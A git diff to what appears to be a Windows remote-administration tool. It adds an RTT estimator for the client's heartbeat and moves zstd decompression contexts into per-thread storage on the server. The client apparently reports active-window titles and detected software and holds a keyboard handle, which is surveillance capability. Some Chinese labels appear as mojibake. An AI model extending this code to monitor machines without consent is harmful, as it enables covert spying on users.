diff --git a/client/IOCPClient.cpp b/client/IOCPClient.cpp index e72f1a9..cdf058e 100644 --- a/client/IOCPClient.cpp +++ b/client/IOCPClient.cpp @@ -394,7 +394,7 @@ VOID IOCPClient::OnServerReceiving(CBuffer* m_CompressedBuffer, char* szBuffer, HeaderEncType encType = HeaderEncUnknown; FlagType flagType = CheckHead(szPacketFlag, encType); if (flagType == FLAG_UNKNOWN) { - Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s'\n", szPacketFlag); + Mprintf("[ERROR] OnServerReceiving memcmp fail: unknown header '%s. Mask: %d'\n", szPacketFlag, maskType); m_CompressedBuffer->ClearBuffer(); break; } diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp index 54dd2cf..2eabc85 100644 --- a/client/KernelManager.cpp +++ b/client/KernelManager.cpp @@ -56,7 +56,7 @@ CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, #else m_settings = { 0 }; #endif - m_nNetPing = -1; + m_nNetPing = {}; m_hKeyboard = kb; } @@ -521,10 +521,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) if (ulLength > 8) { uint64_t n = 0; memcpy(&n, szBuffer + 1, sizeof(uint64_t)); - auto system_ms = std::chrono::time_point_cast( - std::chrono::system_clock::now() - ); - m_nNetPing = int((system_ms.time_since_epoch().count() - n) / 2); + m_nNetPing.update_from_sample(GetUnixMs() - n); } break; case CMD_MASTERSETTING: diff --git a/client/KernelManager.h b/client/KernelManager.h index 66c39d0..224357b 100644 --- a/client/KernelManager.h +++ b/client/KernelManager.h @@ -91,6 +91,36 @@ private: } }; +struct RttEstimator { + double srtt = 0.0; // 平滑 RTT (秒) + double rttvar = 0.0; // RTT 波动 (秒) + double rto = 0.0; // 超时时间 (秒) + bool initialized = false; + + void update_from_sample(double rtt_ms) { + const double alpha = 1.0 / 8; + const double beta = 1.0 / 4; + + // 转换成秒 + double rtt = rtt_ms / 1000.0; + + if (!initialized) { + srtt = rtt; + rttvar = rtt / 2.0; + rto = srtt + 4.0 * rttvar; + initialized = true; + } + else { + rttvar = (1.0 - beta) * rttvar + beta * std::fabs(srtt - rtt); + srtt = (1.0 - alpha) * srtt + alpha * rtt; + rto = srtt + 4.0 * rttvar; + } + + // 限制最小 RTO(RFC 6298 推荐 1 秒) + if (rto < 1.0) rto = 1.0; + } +}; + class CKernelManager : public CManager { public: @@ -107,7 +137,7 @@ public: UINT GetAvailableIndex(); State& g_bExit; // Hide base class variable MasterSettings m_settings; - int m_nNetPing; // 网络状况 + RttEstimator m_nNetPing; // 网络状况 // 发送心跳 int SendHeartbeat() { for (int i = 0; i < m_settings.ReportInterval && !g_bExit && m_ClientObject->IsConnected(); ++i) @@ -122,7 +152,7 @@ public: ActivityWindow checker; auto s = checker.Check(); - Heartbeat a(s, m_nNetPing); + Heartbeat a(s, m_nNetPing.srtt); a.HasSoftware = SoftwareCheck(m_settings.DetectSoftware); diff --git a/common/commands.h b/common/commands.h index da71801..6c7ea7b 100644 --- a/common/commands.h +++ b/common/commands.h @@ -795,6 +795,13 @@ typedef struct LOGIN_INFOR } }LOGIN_INFOR; +inline uint64_t GetUnixMs() { + auto system_ms = std::chrono::time_point_cast( + std::chrono::system_clock::now() + ); + return system_ms.time_since_epoch().count(); +} + // 固定1024字节 typedef struct Heartbeat { @@ -808,10 +815,7 @@ typedef struct Heartbeat memset(this, 0, sizeof(Heartbeat)); } Heartbeat(const std::string& s, int ping = 0) { - auto system_ms = std::chrono::time_point_cast( - std::chrono::system_clock::now() - ); - Time = system_ms.time_since_epoch().count(); + Time = GetUnixMs(); strcpy_s(ActiveWnd, s.c_str()); Ping = ping; memset(Reserved, 0, sizeof(Reserved)); diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index 8e91393..bd51fd8 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -65,7 +65,7 @@ COLUMNSTRUCT g_Column_Data_Online[g_Column_Count_Online] = {"鎿嶄綔绯荤粺", 120 }, {"CPU", 80 }, {"鎽勫儚澶", 70 }, - {"PING", 70 }, + {"RTT", 70 }, {"鐗堟湰", 90 }, {"瀹夎鏃堕棿", 120 }, {"娲诲姩绐楀彛", 140 }, diff --git a/server/2015Remote/IOCPServer.cpp b/server/2015Remote/IOCPServer.cpp index d76cc6c..153bedb 100644 --- a/server/2015Remote/IOCPServer.cpp +++ b/server/2015Remote/IOCPServer.cpp @@ -64,11 +64,6 @@ IOCPServer::IOCPServer(void) m_NotifyProc = NULL; m_OfflineProc = NULL; -#if USING_CTX - m_Cctx = ZSTD_createCCtx(); - m_Dctx = ZSTD_createDCtx(); - ZSTD_CCtx_setParameter(m_Cctx, ZSTD_c_compressionLevel, ZSTD_CLEVEL); -#endif } void IOCPServer::Destroy() { @@ -133,11 +128,6 @@ IOCPServer::~IOCPServer(void) m_ulBusyThread = 0; m_ulKeepLiveTime = 0; -#if USING_CTX - ZSTD_freeCCtx(m_Cctx); - ZSTD_freeDCtx(m_Dctx); -#endif - WSACleanup(); } @@ -304,6 +294,8 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam) { Mprintf("======> IOCPServer WorkThreadProc begin \n"); + ZSTD_DCtx* m_Dctx = ZSTD_createDCtx(); // 解压上下文 + IOCPServer* This = (IOCPServer*)(lParam); HANDLE hCompletionPort = This->m_hCompletionPort; @@ -384,7 +376,7 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam) { try { - This->HandleIO(OverlappedPlus->m_ioType, ContextObject, dwTrans); + This->HandleIO(OverlappedPlus->m_ioType, ContextObject, dwTrans, m_Dctx); ContextObject = NULL; } @@ -405,13 +397,16 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam) if (n == 0) { Mprintf("======> IOCPServer All WorkThreadProc done\n"); } + + ZSTD_freeDCtx(m_Dctx); + Mprintf("======> IOCPServer WorkThreadProc end \n"); return 0; } //在工作线程中被调用 -BOOL IOCPServer::HandleIO(IOType PacketFlags,PCONTEXT_OBJECT ContextObject, DWORD dwTrans) +BOOL IOCPServer::HandleIO(IOType PacketFlags,PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx) { BOOL bRet = FALSE; @@ -421,10 +416,10 @@ BOOL IOCPServer::HandleIO(IOType PacketFlags,PCONTEXT_OBJECT ContextObject, DWOR bRet = OnClientInitializing(ContextObject, dwTrans); break; case IORead: - bRet = OnClientReceiving(ContextObject,dwTrans); + bRet = OnClientReceiving(ContextObject, dwTrans, ctx); break; case IOWrite: - bRet = OnClientPostSending(ContextObject,dwTrans); + bRet = OnClientPostSending(ContextObject, dwTrans); break; case IOIdle: Mprintf("=> HandleIO PacketFlags= IOIdle\n"); @@ -443,7 +438,8 @@ BOOL IOCPServer::OnClientInitializing(PCONTEXT_OBJECT ContextObject, DWORD dwTr } // May be this function should be a member of `CONTEXT_OBJECT`. -BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc) { +BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc, ZSTD_DCtx* m_Dctx) { + AUTO_TICK(40); BOOL ret = 1; try { @@ -547,9 +543,9 @@ BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyP return ret; } -BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans) +BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx) { - if (FALSE == ParseReceivedData(ContextObject, dwTrans, m_NotifyProc)) { + if (FALSE == ParseReceivedData(ContextObject, dwTrans, m_NotifyProc, ctx)) { RemoveStaleContext(ContextObject); return FALSE; } @@ -559,7 +555,7 @@ BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans return TRUE; } -BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength) { +BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength, ZSTD_CCtx* m_Cctx) { assert(ContextObject); // 输出服务端所发送的命令 int cmd = szBuffer[0]; diff --git a/server/2015Remote/IOCPServer.h b/server/2015Remote/IOCPServer.h index 22c9c4f..ea68572 100644 --- a/server/2015Remote/IOCPServer.h +++ b/server/2015Remote/IOCPServer.h @@ -4,11 +4,6 @@ #include #pragma comment(lib,"ws2_32.lib") #include "Server.h" - -#if USING_CTX -#include "zstd/zstd.h" -#endif - #include #define NC_CLIENT_CONNECT 0x0001 @@ -28,14 +23,12 @@ #define C_FAILED(p) ZSTD_isError(p) #define C_SUCCESS(p) (!C_FAILED(p)) #define ZSTD_CLEVEL 5 -#if USING_CTX -#define Mcompress(dest, destLen, source, sourceLen) ZSTD_compress2(m_Cctx, dest, *(destLen), source, sourceLen) -#define Muncompress(dest, destLen, source, sourceLen) ZSTD_decompressDCtx(m_Dctx, dest, *(destLen), source, sourceLen) -#else -#define Mcompress(dest, destLen, source, sourceLen) ZSTD_compress(dest, *(destLen), source, sourceLen, ZSTD_CLEVEL_DEFAULT) -#define Muncompress(dest, destLen, source, sourceLen) ZSTD_decompress(dest, *(destLen), source, sourceLen) -#endif +#define Mcompress(dest, destLen, source, sourceLen) m_Cctx ? ZSTD_compress2(m_Cctx, dest, *(destLen), source, sourceLen):\ + ZSTD_compress(dest, *(destLen), source, sourceLen, ZSTD_CLEVEL_DEFAULT) + +#define Muncompress(dest, destLen, source, sourceLen) m_Dctx ? ZSTD_decompressDCtx(m_Dctx, dest, *(destLen), source, sourceLen):\ + ZSTD_decompress(dest, *(destLen), source, sourceLen) class IOCPServer : public Server { @@ -55,11 +48,6 @@ protected: ULONG m_ulCurrentThread; ULONG m_ulBusyThread; -#if USING_CTX - ZSTD_CCtx* m_Cctx; // 压缩上下文 - ZSTD_DCtx* m_Dctx; // 解压上下文 -#endif - ULONG m_ulKeepLiveTime; pfnNotifyProc m_NotifyProc; pfnOfflineProc m_OfflineProc; @@ -78,9 +66,9 @@ private: VOID RemoveStaleContext(CONTEXT_OBJECT* ContextObject); VOID MoveContextToFreePoolList(CONTEXT_OBJECT* ContextObject); VOID PostRecv(CONTEXT_OBJECT* ContextObject); - BOOL HandleIO(IOType PacketFlags, PCONTEXT_OBJECT ContextObject, DWORD dwTrans); + BOOL HandleIO(IOType PacketFlags, PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx); BOOL OnClientInitializing(PCONTEXT_OBJECT ContextObject, DWORD dwTrans); - BOOL OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans); + BOOL OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx); VOID OnClientPreSending(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength); BOOL OnClientPostSending(CONTEXT_OBJECT* ContextObject, ULONG ulCompressedLength); int AddWorkThread(int n) { @@ -173,6 +161,6 @@ public: typedef CDialogBase DialogBase; -BOOL ParseReceivedData(CONTEXT_OBJECT* ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc); +BOOL ParseReceivedData(CONTEXT_OBJECT* ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc, ZSTD_DCtx *ctx=NULL); -BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength); +BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength, ZSTD_CCtx *ctx=NULL); diff --git a/server/2015Remote/stdafx.h b/server/2015Remote/stdafx.h index cdd9c53..3fcd6df 100644 --- a/server/2015Remote/stdafx.h +++ b/server/2015Remote/stdafx.h @@ -6,7 +6,6 @@ #pragma once #define USING_ZSTD 1 -#define USING_CTX 0 #ifndef _SECURE_ATL #define _SECURE_ATL 1